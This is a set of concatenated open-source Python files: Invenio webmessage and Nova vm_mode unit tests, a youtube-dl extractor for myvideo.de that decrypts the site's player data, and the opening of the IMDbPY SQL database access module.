ln=CFG_SITE_LANG)
self.assertEqual(count_nb_messages(5), 3)
delete_all_messages(5)
self.assertEqual(count_nb_messages(5), 0)
def test_delete_message_from_user_inbox(self):
"""webmessage - delete message from user inbox"""
delete_all_messages(5)
# juliet writes a message to romeo
webmessage.perform_request_send(6,
msg_to_user="romeo",
msg_to_group="",
msg_subject="Hi romeo",
msg_body="hello romeo how are you?",
ln=CFG_SITE_LANG)
msg_id = get_all_messages_for_user(5)[0][0]
delete_message_from_user_inbox(5, msg_id)
self.assertEqual(count_nb_messages(5), 0)
def test_create_message(self):
"""webmessage - create msg but do not send it"""
msgid = create_message(6,
users_to_str="romeo",
groups_to_str="montague-family",
msg_subject="hello",
msg_body="how are you",
msg_send_on_date=datetext_default)
send_message(5, msgid, status=CFG_WEBMESSAGE_STATUS_CODE['NEW'])
result = get_all_messages_for_user(5)
self.assertEqual(msgid, result[0][0] )
delete_all_messages(2)
def test_send_message(self):
"""webmessage - sending message using uid msgid"""
#create a message to know the msgid
msgid = create_message(6,
users_to_str="romeo",
groups_to_str="montague-family",
msg_subject="hello",
msg_body="how are you",
msg_send_on_date=datetext_default)
send_message(5, msgid, status=CFG_WEBMESSAGE_STATUS_CODE['NEW'])
result = get_all_messages_for_user(5)
self.assertEqual("hello", result[0][3])
webmessage.perform_request_delete_msg(5, result[0][0], ln=CFG_SITE_LANG)
def test_check_quota(self):
"""webmessage - you give a quota, it returns users over-quota"""
webmessage.perform_request_send(6,
msg_to_user="jekyll",
msg_to_group="",
msg_subject="Hi jekyll",
msg_body="hello how are you?",
ln=CFG_SITE_LANG)
webmessage.perform_request_send(6,
msg_to_user="jekyll",
msg_to_group="",
msg_subject="Hi jekyll",
msg_body="hello how are you?",
ln=CFG_SITE_LANG)
webmessage.perform_request_send(6,
msg_to_user="jekyll",
msg_to_group="",
msg_subject="Hi jekyll",
msg_body="hello how are you?",
ln=CFG_SITE_LANG)
webmessage.perform_request_send(6,
msg_to_user="jekyll",
msg_to_group="",
msg_subject="Hi jekyll",
msg_body="hello how are you?",
ln=CFG_SITE_LANG)
d = check_quota(3)
self.assertEqual(d.keys()[0], 2)
delete_all_messages(2)
class WebMessageGettingUidsGidsTest(InvenioTestCase):
"""Many way to get uids or gids"""
def test_get_uids_from_nicks(self):
"""webmessage - get uid from nick"""
d = get_uids_from_nicks('juliet')
self.assertEqual(d.get('juliet'), 6)
def test_get_nicks_from_uids(self):
"""webmessage - get nick from uid"""
d = get_nicks_from_uids(6)
self.assertEqual(d.get(6), 'juliet')
def test_get_uids_from_emails(self):
"""webmessage - get uid from email"""
d = get_uids_from_emails('juliet.capulet@cds.cern.ch')
self.assertEqual(d.get('juliet.capulet@cds.cern.ch'), 6)
def test_get_gids_from_groupnames(self):
"""webmessage - get gid from groupname"""
d = get_gids_from_groupnames('montague-family')
self.assertEqual(d.get('montague-family'), 2)
def test_get_uids_members_of_groups(self):
"""webmessage - get uids members of group"""
uids = get_uids_members_of_groups(2)
self.assertEqual(uids[0], 5)
self.assertEqual(uids[1], 6)
self.assertEqual(uids[2], 7)
def test_user_exists(self):
"""webmessage - check if a user exist"""
self.assertEqual(user_exists(6), 1)
class WebMessagePatternTest(InvenioTestCase):
"""pattern"""
def test_get_nicknames_like(self):
"""webmessage - get nickname"""
result = get_nicknames_like('j.')
self.assertEqual(result[0], ('jekyll',))
self.assertEqual(result[1], ('juliet',))
result = get_nicknames_like('j+')
self.assertEqual(result[0], ('jekyll',))
self.assertEqual(result[1], ('juliet',))
def test_get_groupnames_like(self):
"""webmessage - get groupname"""
d = get_groupnames_like(5,'mont+')
self.assertEqual(d.keys()[0], 2L)
self.assertEqual(d.values()[0], 'montague-family')
TEST_SUITE = make_test_suite(WebMessageWebPagesAvailabilityTest,
WebMessageSendingAndReceivingMessageTest,
WebMessageGettingUidsGidsTest,
WebMessagePatternTest)
if __name__ == "__main__":
run_test_suite(TEST_SUITE, warn_user=True)
| gpl-2.0 |
ntt-sic/nova | nova/tests/compute/test_vmmode.py | 11 | 1575 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (C) 2012 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import exception
from nova import test
from nova.compute import vm_mode
class ComputeVMModeTest(test.NoDBTestCase):
def test_case(self):
inst = dict(vm_mode="HVM")
mode = vm_mode.get_from_instance(inst)
self.assertEqual(mode, "hvm")
def test_legacy_pv(self):
inst = dict(vm_mode="pv")
mode = vm_mode.get_from_instance(inst)
self.assertEqual(mode, "xen")
def test_legacy_hv(self):
inst = dict(vm_mode="hv")
mode = vm_mode.get_from_instance(inst)
self.assertEqual(mode, "hvm")
def test_bogus(self):
inst = dict(vm_mode="wibble")
self.assertRaises(exception.Invalid,
vm_mode.get_from_instance,
inst)
def test_good(self):
inst = dict(vm_mode="hvm")
mode = vm_mode.get_from_instance(inst)
self.assertEqual(mode, "hvm")
| apache-2.0 |
LordDamionDevil/Lony | lib/youtube_dl/extractor/myvideo.py | 34 | 6291 | from __future__ import unicode_literals
import binascii
import base64
import hashlib
import re
import json
from .common import InfoExtractor
from ..compat import (
compat_ord,
compat_urllib_parse_unquote,
compat_urllib_parse_urlencode,
)
from ..utils import (
ExtractorError,
sanitized_Request,
)
class MyVideoIE(InfoExtractor):
_WORKING = False
_VALID_URL = r'https?://(?:www\.)?myvideo\.de/(?:[^/]+/)?watch/(?P<id>[0-9]+)/[^?/]+.*'
IE_NAME = 'myvideo'
_TEST = {
'url': 'http://www.myvideo.de/watch/8229274/bowling_fail_or_win',
'md5': '2d2753e8130479ba2cb7e0a37002053e',
'info_dict': {
'id': '8229274',
'ext': 'flv',
'title': 'bowling-fail-or-win',
}
}
# Original Code from: https://github.com/dersphere/plugin.video.myvideo_de.git
# Released into the Public Domain by Tristan Fischer on 2013-05-19
# https://github.com/rg3/youtube-dl/pull/842
def __rc4crypt(self, data, key):
x = 0
box = list(range(256))
for i in list(range(256)):
x = (x + box[i] + compat_ord(key[i % len(key)])) % 256
box[i], box[x] = box[x], box[i]
x = 0
y = 0
out = ''
for char in data:
x = (x + 1) % 256
y = (y + box[x]) % 256
box[x], box[y] = box[y], box[x]
out += chr(compat_ord(char) ^ box[(box[x] + box[y]) % 256])
return out
def __md5(self, s):
return hashlib.md5(s).hexdigest().encode()
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
GK = (
b'WXpnME1EZGhNRGhpTTJNM01XVmhOREU0WldNNVpHTTJOakpt'
b'TW1FMU5tVTBNR05pWkRaa05XRXhNVFJoWVRVd1ptSXhaVEV3'
b'TnpsbA0KTVRkbU1tSTRNdz09'
)
# Get video webpage
webpage_url = 'http://www.myvideo.de/watch/%s' % video_id
webpage = self._download_webpage(webpage_url, video_id)
mobj = re.search('source src=\'(.+?)[.]([^.]+)\'', webpage)
if mobj is not None:
self.report_extraction(video_id)
video_url = mobj.group(1) + '.flv'
video_title = self._html_search_regex('<title>([^<]+)</title>',
webpage, 'title')
return {
'id': video_id,
'url': video_url,
'title': video_title,
}
mobj = re.search(r'data-video-service="/service/data/video/%s/config' % video_id, webpage)
if mobj is not None:
request = sanitized_Request('http://www.myvideo.de/service/data/video/%s/config' % video_id, '')
response = self._download_webpage(request, video_id,
'Downloading video info')
info = json.loads(base64.b64decode(response).decode('utf-8'))
return {
'id': video_id,
'title': info['title'],
'url': info['streaming_url'].replace('rtmpe', 'rtmpt'),
'play_path': info['filename'],
'ext': 'flv',
'thumbnail': info['thumbnail'][0]['url'],
}
# try encxml
mobj = re.search('var flashvars={(.+?)}', webpage)
if mobj is None:
raise ExtractorError('Unable to extract video')
params = {}
encxml = ''
sec = mobj.group(1)
for (a, b) in re.findall('(.+?):\'(.+?)\',?', sec):
if not a == '_encxml':
params[a] = b
else:
encxml = compat_urllib_parse_unquote(b)
if not params.get('domain'):
params['domain'] = 'www.myvideo.de'
xmldata_url = '%s?%s' % (encxml, compat_urllib_parse_urlencode(params))
if 'flash_playertype=MTV' in xmldata_url:
self._downloader.report_warning('avoiding MTV player')
xmldata_url = (
'http://www.myvideo.de/dynamic/get_player_video_xml.php'
'?flash_playertype=D&ID=%s&_countlimit=4&autorun=yes'
) % video_id
# get enc data
enc_data = self._download_webpage(xmldata_url, video_id).split('=')[1]
enc_data_b = binascii.unhexlify(enc_data)
sk = self.__md5(
base64.b64decode(base64.b64decode(GK)) +
self.__md5(
str(video_id).encode('utf-8')
)
)
dec_data = self.__rc4crypt(enc_data_b, sk)
# extracting infos
self.report_extraction(video_id)
video_url = None
mobj = re.search('connectionurl=\'(.*?)\'', dec_data)
if mobj:
video_url = compat_urllib_parse_unquote(mobj.group(1))
if 'myvideo2flash' in video_url:
self.report_warning(
'Rewriting URL to use unencrypted rtmp:// ...',
video_id)
video_url = video_url.replace('rtmpe://', 'rtmp://')
if not video_url:
# extract non rtmp videos
mobj = re.search('path=\'(http.*?)\' source=\'(.*?)\'', dec_data)
if mobj is None:
raise ExtractorError('unable to extract url')
video_url = compat_urllib_parse_unquote(mobj.group(1)) + compat_urllib_parse_unquote(mobj.group(2))
video_file = self._search_regex('source=\'(.*?)\'', dec_data, 'video file')
video_file = compat_urllib_parse_unquote(video_file)
if not video_file.endswith('f4m'):
ppath, prefix = video_file.split('.')
video_playpath = '%s:%s' % (prefix, ppath)
else:
video_playpath = ''
video_swfobj = self._search_regex(r'swfobject.embedSWF\(\'(.+?)\'', webpage, 'swfobj')
video_swfobj = compat_urllib_parse_unquote(video_swfobj)
video_title = self._html_search_regex("<h1(?: class='globalHd')?>(.*?)</h1>",
webpage, 'title')
return {
'id': video_id,
'url': video_url,
'tc_url': video_url,
'title': video_title,
'ext': 'flv',
'play_path': video_playpath,
'player_url': video_swfobj,
}
| gpl-3.0 |
jackkiej/SickRage | lib/imdb/parser/sql/__init__.py | 67 | 66238 | """
parser.sql package (imdb package).
This package provides the IMDbSqlAccessSystem class used to access
IMDb's data through a SQL database. Every database supported by
the SQLObject _AND_ SQLAlchemy Object Relational Managers is available.
the imdb.IMDb function will return an instance of this class when
called with the 'accessSystem' argument set to "sql", "database" or "db".
Copyright 2005-2012 Davide Alberani <da@erlug.linux.it>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
# FIXME: this whole module was written in a veeery short amount of time.
# The code should be commented, rewritten and cleaned. :-)
import re
import logging
from difflib import SequenceMatcher
from codecs import lookup
from imdb import IMDbBase
from imdb.utils import normalizeName, normalizeTitle, build_title, \
build_name, analyze_name, analyze_title, \
canonicalTitle, canonicalName, re_titleRef, \
build_company_name, re_episodes, _unicodeArticles, \
analyze_company_name, re_year_index, re_nameRef
from imdb.Person import Person
from imdb.Movie import Movie
from imdb.Company import Company
from imdb._exceptions import IMDbDataAccessError, IMDbError
# Logger for miscellaneous functions.
_aux_logger = logging.getLogger('imdbpy.parser.sql.aux')
# =============================
# Things that once upon a time were in imdb.parser.common.locsql.
def titleVariations(title, fromPtdf=0):
"""Build title variations useful for searches; if fromPtdf is true,
the input is assumed to be in the plain text data files format."""
if fromPtdf: title1 = u''
else: title1 = title
title2 = title3 = u''
if fromPtdf or re_year_index.search(title):
# If it appears to have a (year[/imdbIndex]) indication,
# assume that a long imdb canonical name was provided.
titldict = analyze_title(title, canonical=1)
# title1: the canonical name.
title1 = titldict['title']
if titldict['kind'] != 'episode':
# title3: the long imdb canonical name.
if fromPtdf: title3 = title
else: title3 = build_title(titldict, canonical=1, ptdf=1)
else:
title1 = normalizeTitle(title1)
title3 = build_title(titldict, canonical=1, ptdf=1)
else:
# Just a title.
# title1: the canonical title.
title1 = canonicalTitle(title)
title3 = u''
# title2 is title1 without the article, or title1 unchanged.
if title1:
title2 = title1
t2s = title2.split(u', ')
if t2s[-1].lower() in _unicodeArticles:
title2 = u', '.join(t2s[:-1])
_aux_logger.debug('title variations: 1:[%s] 2:[%s] 3:[%s]',
title1, title2, title3)
return title1, title2, title3
re_nameIndex = re.compile(r'\(([IVXLCDM]+)\)')
def nameVariations(name, fromPtdf=0):
"""Build name variations useful for searches; if fromPtdf is true,
the input is assumed to be in the plain text data files format."""
name1 = name2 = name3 = u''
if fromPtdf or re_nameIndex.search(name):
# We've a name with an (imdbIndex)
namedict = analyze_name(name, canonical=1)
# name1 is the name in the canonical format.
name1 = namedict['name']
# name3 is the canonical name with the imdbIndex.
if fromPtdf:
if namedict.has_key('imdbIndex'):
name3 = name
else:
name3 = build_name(namedict, canonical=1)
else:
# name1 is the name in the canonical format.
name1 = canonicalName(name)
name3 = u''
# name2 is the name in the normal format, if it differs from name1.
name2 = normalizeName(name1)
if name1 == name2: name2 = u''
_aux_logger.debug('name variations: 1:[%s] 2:[%s] 3:[%s]',
name1, name2, name3)
return name1, name2, name3
try:
from cutils import ratcliff as _ratcliff
def ratcliff(s1, s2, sm):
"""Return the Ratcliff-Obershelp value between the two strings,
using the C implementation."""
return _ratcliff(s1.encode('latin_1', 'replace'),
s2.encode('latin_1', 'replace'))
except ImportError:
_aux_logger.warn('Unable to import the cutils.ratcliff function.'
' Searching names and titles using the "sql"'
' data access system will be slower.')
def ratcliff(s1, s2, sm):
"""Ratcliff-Obershelp similarity."""
STRING_MAXLENDIFFER = 0.7
s1len = len(s1)
s2len = len(s2)
if s1len < s2len:
threshold = float(s1len) / s2len
else:
threshold = float(s2len) / s1len
if threshold < STRING_MAXLENDIFFER:
return 0.0
sm.set_seq2(s2.lower())
return sm.ratio()
def merge_roles(mop):
"""Merge multiple roles."""
new_list = []
for m in mop:
if m in new_list:
keep_this = new_list[new_list.index(m)]
if not isinstance(keep_this.currentRole, list):
keep_this.currentRole = [keep_this.currentRole]
keep_this.currentRole.append(m.currentRole)
else:
new_list.append(m)
return new_list
def scan_names(name_list, name1, name2, name3, results=0, ro_thresold=None,
_scan_character=False):
"""Scan a list of names, searching for best matches against
the given variations."""
if ro_thresold is not None: RO_THRESHOLD = ro_thresold
else: RO_THRESHOLD = 0.6
sm1 = SequenceMatcher()
sm2 = SequenceMatcher()
sm3 = SequenceMatcher()
sm1.set_seq1(name1.lower())
if name2: sm2.set_seq1(name2.lower())
if name3: sm3.set_seq1(name3.lower())
resd = {}
for i, n_data in name_list:
nil = n_data['name']
# XXX: on Symbian, here we get a str; not sure this is the
# right place to fix it.
if isinstance(nil, str):
nil = unicode(nil, 'latin1', 'ignore')
# Distance with the canonical name.
ratios = [ratcliff(name1, nil, sm1) + 0.05]
namesurname = u''
if not _scan_character:
nils = nil.split(', ', 1)
surname = nils[0]
if len(nils) == 2: namesurname = '%s %s' % (nils[1], surname)
else:
nils = nil.split(' ', 1)
surname = nils[-1]
namesurname = nil
if surname != nil:
# Distance with the "Surname" in the database.
ratios.append(ratcliff(name1, surname, sm1))
if not _scan_character:
ratios.append(ratcliff(name1, namesurname, sm1))
if name2:
ratios.append(ratcliff(name2, surname, sm2))
# Distance with the "Name Surname" in the database.
if namesurname:
ratios.append(ratcliff(name2, namesurname, sm2))
if name3:
# Distance with the long imdb canonical name.
ratios.append(ratcliff(name3,
build_name(n_data, canonical=1), sm3) + 0.1)
ratio = max(ratios)
if ratio >= RO_THRESHOLD:
if resd.has_key(i):
if ratio > resd[i][0]: resd[i] = (ratio, (i, n_data))
else: resd[i] = (ratio, (i, n_data))
res = resd.values()
res.sort()
res.reverse()
if results > 0: res[:] = res[:results]
return res
def scan_titles(titles_list, title1, title2, title3, results=0,
searchingEpisode=0, onlyEpisodes=0, ro_thresold=None):
"""Scan a list of titles, searching for best matches against
the given variations."""
if ro_thresold is not None: RO_THRESHOLD = ro_thresold
else: RO_THRESHOLD = 0.6
sm1 = SequenceMatcher()
sm2 = SequenceMatcher()
sm3 = SequenceMatcher()
sm1.set_seq1(title1.lower())
sm2.set_seq2(title2.lower())
if title3:
sm3.set_seq1(title3.lower())
if title3[-1] == '}': searchingEpisode = 1
hasArt = 0
if title2 != title1: hasArt = 1
resd = {}
for i, t_data in titles_list:
if onlyEpisodes:
if t_data.get('kind') != 'episode':
continue
til = t_data['title']
if til[-1] == ')':
dateIdx = til.rfind('(')
if dateIdx != -1:
til = til[:dateIdx].rstrip()
if not til:
continue
ratio = ratcliff(title1, til, sm1)
if ratio >= RO_THRESHOLD:
resd[i] = (ratio, (i, t_data))
continue
if searchingEpisode:
if t_data.get('kind') != 'episode': continue
elif t_data.get('kind') == 'episode': continue
til = t_data['title']
# XXX: on Symbian, here we get a str; not sure this is the
# right place to fix it.
if isinstance(til, str):
til = unicode(til, 'latin1', 'ignore')
# Distance with the canonical title (with or without article).
# titleS -> titleR
# titleS, the -> titleR, the
if not searchingEpisode:
til = canonicalTitle(til)
ratios = [ratcliff(title1, til, sm1) + 0.05]
# til2 is til without the article, if present.
til2 = til
tils = til2.split(', ')
matchHasArt = 0
if tils[-1].lower() in _unicodeArticles:
til2 = ', '.join(tils[:-1])
matchHasArt = 1
if hasArt and not matchHasArt:
# titleS[, the] -> titleR
ratios.append(ratcliff(title2, til, sm2))
elif matchHasArt and not hasArt:
# titleS -> titleR[, the]
ratios.append(ratcliff(title1, til2, sm1))
else:
ratios = [0.0]
if title3:
# Distance with the long imdb canonical title.
ratios.append(ratcliff(title3,
build_title(t_data, canonical=1, ptdf=1), sm3) + 0.1)
ratio = max(ratios)
if ratio >= RO_THRESHOLD:
if resd.has_key(i):
if ratio > resd[i][0]:
resd[i] = (ratio, (i, t_data))
else: resd[i] = (ratio, (i, t_data))
res = resd.values()
res.sort()
res.reverse()
if results > 0: res[:] = res[:results]
return res
def scan_company_names(name_list, name1, results=0, ro_thresold=None):
"""Scan a list of company names, searching for best matches against
the given name. Notice that this function takes a list of
strings, and not a list of dictionaries."""
if ro_thresold is not None: RO_THRESHOLD = ro_thresold
else: RO_THRESHOLD = 0.6
sm1 = SequenceMatcher()
sm1.set_seq1(name1.lower())
resd = {}
withoutCountry = not name1.endswith(']')
for i, n in name_list:
# XXX: on Symbian, here we get a str; not sure this is the
# right place to fix it.
if isinstance(n, str):
n = unicode(n, 'latin1', 'ignore')
o_name = n
var = 0.0
if withoutCountry and n.endswith(']'):
cidx = n.rfind('[')
if cidx != -1:
n = n[:cidx].rstrip()
var = -0.05
# Distance with the company name.
ratio = ratcliff(name1, n, sm1) + var
if ratio >= RO_THRESHOLD:
if resd.has_key(i):
if ratio > resd[i][0]: resd[i] = (ratio,
(i, analyze_company_name(o_name)))
else:
resd[i] = (ratio, (i, analyze_company_name(o_name)))
res = resd.values()
res.sort()
res.reverse()
if results > 0: res[:] = res[:results]
return res
try:
from cutils import soundex
except ImportError:
_aux_logger.warn('Unable to import the cutils.soundex function.'
' Searches of movie titles and person names will be'
' a bit slower.')
_translate = dict(B='1', C='2', D='3', F='1', G='2', J='2', K='2', L='4',
M='5', N='5', P='1', Q='2', R='6', S='2', T='3', V='1',
X='2', Z='2')
_translateget = _translate.get
_re_non_ascii = re.compile(r'^[^a-z]*', re.I)
SOUNDEX_LEN = 5
def soundex(s):
"""Return the soundex code for the given string."""
# Maximum length of the soundex code.
s = _re_non_ascii.sub('', s)
if not s: return None
s = s.upper()
soundCode = s[0]
for c in s[1:]:
cw = _translateget(c, '0')
if cw != '0' and soundCode[-1] != cw:
soundCode += cw
return soundCode[:SOUNDEX_LEN] or None
def _sortKeywords(keyword, kwds):
"""Sort a list of keywords, based on the searched one."""
sm = SequenceMatcher()
sm.set_seq1(keyword.lower())
ratios = [(ratcliff(keyword, k, sm), k) for k in kwds]
checkContained = False
if len(keyword) > 4:
checkContained = True
for idx, data in enumerate(ratios):
ratio, key = data
if key.startswith(keyword):
ratios[idx] = (ratio+0.5, key)
elif checkContained and keyword in key:
ratios[idx] = (ratio+0.3, key)
ratios.sort()
ratios.reverse()
return [r[1] for r in ratios]
def filterSimilarKeywords(keyword, kwdsIterator):
"""Return a sorted list of keywords similar to the one given."""
seenDict = {}
kwdSndx = soundex(keyword.encode('ascii', 'ignore'))
matches = []
matchesappend = matches.append
checkContained = False
if len(keyword) > 4:
checkContained = True
for movieID, key in kwdsIterator:
if key in seenDict:
continue
seenDict[key] = None
if checkContained and keyword in key:
matchesappend(key)
continue
if kwdSndx == soundex(key.encode('ascii', 'ignore')):
matchesappend(key)
return _sortKeywords(keyword, matches)
# =============================
_litlist = ['screenplay/teleplay', 'novel', 'adaption', 'book',
'production process protocol', 'interviews',
'printed media reviews', 'essays', 'other literature']
_litd = dict([(x, ('literature', x)) for x in _litlist])
_buslist = ['budget', 'weekend gross', 'gross', 'opening weekend', 'rentals',
'admissions', 'filming dates', 'production dates', 'studios',
'copyright holder']
_busd = dict([(x, ('business', x)) for x in _buslist])
def _reGroupDict(d, newgr):
"""Regroup keys in the d dictionary in subdictionaries, based on
the scheme in the newgr dictionary.
E.g.: in the newgr, an entry 'LD label': ('laserdisc', 'label')
tells the _reGroupDict() function to take the entry with
label 'LD label' (as received from the sql database)
and put it in the subsection (another dictionary) named
'laserdisc', using the key 'label'."""
r = {}
newgrks = newgr.keys()
for k, v in d.items():
if k in newgrks:
r.setdefault(newgr[k][0], {})[newgr[k][1]] = v
# A not-so-clearer version:
##r.setdefault(newgr[k][0], {})
##r[newgr[k][0]][newgr[k][1]] = v
else: r[k] = v
return r
def _groupListBy(l, index):
"""Regroup items in a list in a list of lists, grouped by
the value at the given index."""
tmpd = {}
for item in l:
tmpd.setdefault(item[index], []).append(item)
res = tmpd.values()
return res
def sub_dict(d, keys):
"""Return the subdictionary of 'd', with just the keys listed in 'keys'."""
return dict([(k, d[k]) for k in keys if k in d])
def get_movie_data(movieID, kindDict, fromAka=0, _table=None):
"""Return a dictionary containing data about the given movieID;
if fromAka is true, the AkaTitle table is searched; _table is
reserved for the imdbpy2sql.py script."""
if _table is not None:
Table = _table
else:
if not fromAka: Table = Title
else: Table = AkaTitle
try:
m = Table.get(movieID)
except Exception, e:
_aux_logger.warn('Unable to fetch information for movieID %s: %s', movieID, e)
mdict = {}
return mdict
mdict = {'title': m.title, 'kind': kindDict[m.kindID],
'year': m.productionYear, 'imdbIndex': m.imdbIndex,
'season': m.seasonNr, 'episode': m.episodeNr}
if not fromAka:
if m.seriesYears is not None:
mdict['series years'] = unicode(m.seriesYears)
if mdict['imdbIndex'] is None: del mdict['imdbIndex']
if mdict['year'] is None: del mdict['year']
else:
try:
mdict['year'] = int(mdict['year'])
except (TypeError, ValueError):
del mdict['year']
if mdict['season'] is None: del mdict['season']
else:
try: mdict['season'] = int(mdict['season'])
except: pass
if mdict['episode'] is None: del mdict['episode']
else:
try: mdict['episode'] = int(mdict['episode'])
except: pass
episodeOfID = m.episodeOfID
if episodeOfID is not None:
ser_dict = get_movie_data(episodeOfID, kindDict, fromAka)
mdict['episode of'] = Movie(data=ser_dict, movieID=episodeOfID,
accessSystem='sql')
if fromAka:
ser_note = AkaTitle.get(episodeOfID).note
if ser_note:
mdict['episode of'].notes = ser_note
return mdict
def _iterKeywords(results):
"""Iterate over (key.id, key.keyword) columns of a selection of
the Keyword table."""
for key in results:
yield key.id, key.keyword
def getSingleInfo(table, movieID, infoType, notAList=False):
"""Return a dictionary in the form {infoType: infoListOrString},
retrieving a single set of information about a given movie, from
the specified table."""
infoTypeID = InfoType.select(InfoType.q.info == infoType)
if infoTypeID.count() == 0:
return {}
res = table.select(AND(table.q.movieID == movieID,
table.q.infoTypeID == infoTypeID[0].id))
retList = []
for r in res:
info = r.info
note = r.note
if note:
info += u'::%s' % note
retList.append(info)
if not retList:
return {}
if not notAList: return {infoType: retList}
else: return {infoType: retList[0]}
def _cmpTop(a, b, what='top 250 rank'):
"""Compare function used to sort top 250/bottom 10 rank."""
av = int(a[1].get(what))
bv = int(b[1].get(what))
if av == bv:
return 0
return (-1, 1)[av > bv]
def _cmpBottom(a, b):
"""Compare function used to sort top 250/bottom 10 rank."""
return _cmpTop(a, b, what='bottom 10 rank')
class IMDbSqlAccessSystem(IMDbBase):
"""The class used to access IMDb's data through a SQL database."""
accessSystem = 'sql'
_sql_logger = logging.getLogger('imdbpy.parser.sql')
def __init__(self, uri, adultSearch=1, useORM=None, *arguments, **keywords):
"""Initialize the access system."""
IMDbBase.__init__(self, *arguments, **keywords)
if useORM is None:
useORM = ('sqlobject', 'sqlalchemy')
if not isinstance(useORM, (tuple, list)):
if ',' in useORM:
useORM = useORM.split(',')
else:
useORM = [useORM]
self.useORM = useORM
nrMods = len(useORM)
_gotError = False
DB_TABLES = []
for idx, mod in enumerate(useORM):
mod = mod.strip().lower()
try:
if mod == 'sqlalchemy':
from alchemyadapter import getDBTables, NotFoundError, \
setConnection, AND, OR, IN, \
ISNULL, CONTAINSSTRING, toUTF8
elif mod == 'sqlobject':
from objectadapter import getDBTables, NotFoundError, \
setConnection, AND, OR, IN, \
ISNULL, CONTAINSSTRING, toUTF8
else:
self._sql_logger.warn('unknown module "%s"' % mod)
continue
self._sql_logger.info('using %s ORM', mod)
# XXX: look ma'... black magic! It's used to make
# TableClasses and some functions accessible
# through the whole module.
for k, v in [('NotFoundError', NotFoundError),
('AND', AND), ('OR', OR), ('IN', IN),
('ISNULL', ISNULL),
('CONTAINSSTRING', CONTAINSSTRING)]:
globals()[k] = v
self.toUTF8 = toUTF8
DB_TABLES = getDBTables(uri)
for t in DB_TABLES:
globals()[t._imdbpyName] = t
if _gotError:
self._sql_logger.warn('falling back to "%s"' % mod)
break
except ImportError, e:
if idx+1 >= nrMods:
raise IMDbError('unable to use any ORM in %s: %s' % (
str(useORM), str(e)))
else:
self._sql_logger.warn('unable to use "%s": %s' % (mod,
str(e)))
_gotError = True
continue
else:
raise IMDbError('unable to use any ORM in %s' % str(useORM))
# Set the connection to the database.
self._sql_logger.debug('connecting to %s', uri)
try:
self._connection = setConnection(uri, DB_TABLES)
except AssertionError, e:
raise IMDbDataAccessError( \
'unable to connect to the database server; ' + \
'complete message: "%s"' % str(e))
self.Error = self._connection.module.Error
# Maps some IDs to the corresponding strings.
self._kind = {}
self._kindRev = {}
self._sql_logger.debug('reading constants from the database')
try:
for kt in KindType.select():
self._kind[kt.id] = kt.kind
self._kindRev[str(kt.kind)] = kt.id
except self.Error:
# NOTE: you can also get the error, but - at least with
# MySQL - it also contains the password, and I don't
# like the idea to print it out.
raise IMDbDataAccessError( \
'unable to connect to the database server')
self._role = {}
for rl in RoleType.select():
self._role[rl.id] = str(rl.role)
self._info = {}
self._infoRev = {}
for inf in InfoType.select():
self._info[inf.id] = str(inf.info)
self._infoRev[str(inf.info)] = inf.id
self._compType = {}
for cType in CompanyType.select():
self._compType[cType.id] = cType.kind
info = [(it.id, it.info) for it in InfoType.select()]
self._compcast = {}
for cc in CompCastType.select():
self._compcast[cc.id] = str(cc.kind)
self._link = {}
for lt in LinkType.select():
self._link[lt.id] = str(lt.link)
self._moviesubs = {}
# Build self._moviesubs, a dictionary used to rearrange
# the data structure for a movie object.
for vid, vinfo in info:
if not vinfo.startswith('LD '): continue
self._moviesubs[vinfo] = ('laserdisc', vinfo[3:])
self._moviesubs.update(_litd)
self._moviesubs.update(_busd)
self.do_adult_search(adultSearch)
def _findRefs(self, o, trefs, nrefs):
"""Find titles or names references in strings."""
if isinstance(o, (unicode, str)):
for title in re_titleRef.findall(o):
a_title = analyze_title(title, canonical=0)
rtitle = build_title(a_title, ptdf=1)
if trefs.has_key(rtitle): continue
movieID = self._getTitleID(rtitle)
if movieID is None:
movieID = self._getTitleID(title)
if movieID is None:
continue
m = Movie(title=rtitle, movieID=movieID,
accessSystem=self.accessSystem)
trefs[rtitle] = m
rtitle2 = canonicalTitle(a_title.get('title', u''))
if rtitle2 and rtitle2 != rtitle and rtitle2 != title:
trefs[rtitle2] = m
if title != rtitle:
trefs[title] = m
for name in re_nameRef.findall(o):
a_name = analyze_name(name, canonical=1)
rname = build_name(a_name, canonical=1)
if nrefs.has_key(rname): continue
personID = self._getNameID(rname)
if personID is None:
personID = self._getNameID(name)
if personID is None: continue
p = Person(name=rname, personID=personID,
accessSystem=self.accessSystem)
nrefs[rname] = p
rname2 = normalizeName(a_name.get('name', u''))
if rname2 and rname2 != rname:
nrefs[rname2] = p
if name != rname and name != rname2:
nrefs[name] = p
elif isinstance(o, (list, tuple)):
for item in o:
self._findRefs(item, trefs, nrefs)
elif isinstance(o, dict):
for value in o.values():
self._findRefs(value, trefs, nrefs)
return (trefs, nrefs)
def _extractRefs(self, o):
"""Scan for titles or names references in strings."""
trefs = {}
nrefs = {}
try:
return self._findRefs(o, trefs, nrefs)
except RuntimeError, e:
# Symbian/python 2.2 has a poor regexp implementation.
import warnings
warnings.warn('RuntimeError in '
"imdb.parser.sql.IMDbSqlAccessSystem; "
"if it's not a recursion limit exceeded and we're not "
"running in a Symbian environment, it's a bug:\n%s" % e)
return (trefs, nrefs)
def _changeAKAencoding(self, akanotes, akatitle):
"""Return akatitle in the correct charset, as specified in
the akanotes field; if akatitle doesn't need to be modified,
return None."""
oti = akanotes.find('(original ')
if oti == -1: return None
ote = akanotes[oti+10:].find(' title)')
if ote != -1:
cs_info = akanotes[oti+10:oti+10+ote].lower().split()
